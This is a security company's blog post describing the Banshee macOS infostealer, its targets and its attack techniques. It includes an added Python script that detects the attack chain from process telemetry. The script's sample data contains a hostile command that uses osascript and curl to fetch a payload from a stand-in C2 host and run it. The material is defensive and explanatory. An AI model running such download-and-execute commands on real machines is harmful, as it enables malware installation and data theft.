Banshee malware now affecting Macs


Published on: 25th February 2025

We’re all familiar with the saying “an apple a day keeps the doctor away.” But in the realm of cybersecurity, a new kind of threat called banshee malware is making security experts rethink that.

Banshee malware is an information stealer that can hide itself among system processes, allowing attackers to steal:

– Browser credentials

– Crypto wallet details

– Sensitive files and system info that could be used for other attacks or sold on the dark web

Banshee malware is stealthy because it blends in with normal computer activity, making it harder for antivirus software to detect and allowing it to operate unnoticed. Some of that stealth comes from Apple itself: the malware’s developers reused code from Apple’s own malware protection system, XProtect, to help mask the actions Banshee takes.

You might be thinking that Macs don’t get viruses. It’s true that macOS has historically faced fewer threats than Windows. However, the growing popularity of MacBooks has made them a much larger target. Banshee malware is a reminder that, when it comes to security, MacBooks aren’t immune. They have their own vulnerabilities and need robust, proactive defence just like any other device in your environment.

We know that Banshee malware was able to get past many common antivirus tools. While antivirus still plays an important role, signature-based detection alone isn’t enough against more advanced attacks. Proactive defence that makes use of behavioural or anomaly-based detection, regular patching, user education, and incident response is needed to keep threats at bay.

Common Tactics, Techniques and Procedures (TTPs) attackers have used to deliver and execute Banshee malware are:

  • Application Layer Protocol
  • Command and Scripting Interpreter
  • Phishing
  • Ingress Tool Transfer

Phishing

The attacker starts by launching a phishing campaign, sending emails with a malicious attachment or a link that leads to a fake login page. The goal is to trick the victim into providing credentials or downloading malware.

Command and Scripting Interpreter

Once the victim opens the malicious attachment or interacts with the phishing link, the attacker uses a command and scripting interpreter to execute commands on the compromised machine. The script could download and run additional malware or deploy a backdoor, allowing the attacker to maintain access.

Application Layer Protocol

After gaining access to the user’s machine, the attacker uses standard application layer protocols to blend communication with a remote command and control (C2) server into normal traffic. This allows the attacker to send further commands or exfiltrate data while bypassing security measures.

Ingress Tool Transfer

To further advance the attack, the attacker uses an Ingress Tool Transfer, copying tools or scripts from the C2 server to the compromised system. These tools could be used to escalate privileges, move laterally to other machines, and collect sensitive data from the network. The transfer itself may also be obfuscated to avoid detection.
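The behavioural detection the post argues for can be illustrated on the TTP chain just described. The following script is an added example and is not code from the original post or from any vendor: it correlates a scripting interpreter launching a download tool (Command and Scripting Interpreter leading to Ingress Tool Transfer) with that downloaded file later being executed, rather than matching a file hash. The event format, host names, process names, paths and URLs are all constructed for the example and are not observed Banshee indicators.

```python
"""Behaviour-based detection over constructed macOS process events.

Added example, not code from the original post: it correlates the TTP chain the
post describes (a scripting interpreter fetching a file, i.e. Ingress Tool
Transfer, and that file then being executed) instead of matching a file hash.
The event format, process names, paths, hosts and URLs below are assumptions
made up for the example; they are not observed Banshee indicators.
"""
import re

# Process names treated as scripting interpreters and download tools (assumed lists).
INTERPRETERS = {"osascript", "sh", "bash", "zsh", "python3"}
DOWNLOADERS = {"curl", "wget"}

# Constructed sample telemetry: "timestamp|host|pid|ppid|process|cmdline".
# PIDs 640-650 model the chain from the post; 700-701 are benign browser activity.
SAMPLE_EVENTS = """\
2025-02-25T09:00:01|mac-01|501|1|Mail|/Applications/Mail.app/Contents/MacOS/Mail
2025-02-25T09:00:15|mac-01|612|501|Preview|open /Users/alice/Downloads/Invoice.pdf
2025-02-25T09:01:02|mac-01|640|612|osascript|osascript -e 'do shell script "curl -s http://c2.example.invalid/u -o /tmp/.u"'
2025-02-25T09:01:03|mac-01|641|640|curl|curl -s http://c2.example.invalid/u -o /tmp/.u
2025-02-25T09:01:10|mac-01|650|640|sh|sh /tmp/.u
2025-02-25T09:05:00|mac-01|700|1|Safari|/Applications/Safari.app/Contents/MacOS/Safari
2025-02-25T09:05:01|mac-01|701|700|curl|curl -s https://updates.example.invalid/feed.json
"""


def parse_events(text):
    """Parse pipe-delimited event lines into dicts (the cmdline field may contain '|')."""
    events = []
    for line in text.strip().splitlines():
        ts, host, pid, ppid, proc, cmd = line.split("|", 5)
        events.append({"ts": ts, "host": host, "pid": int(pid),
                       "ppid": int(ppid), "proc": proc, "cmd": cmd})
    return events


def output_path(cmdline):
    """Return the local file a curl/wget command writes with -o/--output, if any."""
    m = re.search(r"(?:^|\s)(?:-o|--output)\s+(\S+)", cmdline)
    return m.group(1) if m else None


def lineage(by_key, event):
    """Process names from the outermost known ancestor down to this event."""
    names, key = [], (event["host"], event["pid"])
    while key in by_key:
        names.append(by_key[key]["proc"])
        key = (event["host"], by_key[key]["ppid"])
    return list(reversed(names))


def detect(events):
    """Apply two behavioural rules over chronologically ordered events."""
    by_key = {(e["host"], e["pid"]): e for e in events}
    fetched = {}  # (host, path) -> pid of the download that created the file
    findings = []
    for e in events:
        parent = by_key.get((e["host"], e["ppid"]))
        # Rule 1: a scripting interpreter launches a download tool
        # (Command and Scripting Interpreter -> Ingress Tool Transfer).
        if e["proc"] in DOWNLOADERS and parent and parent["proc"] in INTERPRETERS:
            findings.append({"rule": "interpreter_spawns_downloader", "host": e["host"],
                             "pid": e["pid"], "chain": lineage(by_key, e)})
            path = output_path(e["cmd"])
            if path:
                fetched[(e["host"], path)] = e["pid"]
        # Rule 2: a file fetched under rule 1 is later handed to another process
        # on the same host, i.e. the transferred tool is being run.
        for (host, path), dl_pid in fetched.items():
            if host == e["host"] and e["pid"] != dl_pid and path in e["cmd"].split():
                findings.append({"rule": "fetched_file_executed", "host": host,
                                 "pid": e["pid"], "path": path,
                                 "chain": lineage(by_key, e)})
    return findings


if __name__ == "__main__":
    for f in detect(parse_events(SAMPLE_EVENTS)):
        print(f["rule"], f["host"], f["pid"], " -> ".join(f["chain"]))
```

Run against the constructed sample, the script raises two findings for the Mail → Preview → osascript lineage and none for Safari fetching its update feed, which is the point of correlating parent process and follow-on execution rather than alerting on every use of curl. In practice the event source would be an EDR process feed or Endpoint Security framework telemetry, and the interpreter and downloader lists would be tuned to the environment.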

As we’ve seen, assuming any one platform is inherently “safe” is a recipe for disaster. Banshee malware may be the latest reason for Mac users to stay on their toes, but it certainly won’t be the last.

Get in touch to ensure you have proactive defences to keep threats at bay.

Speak to our engineers and experts.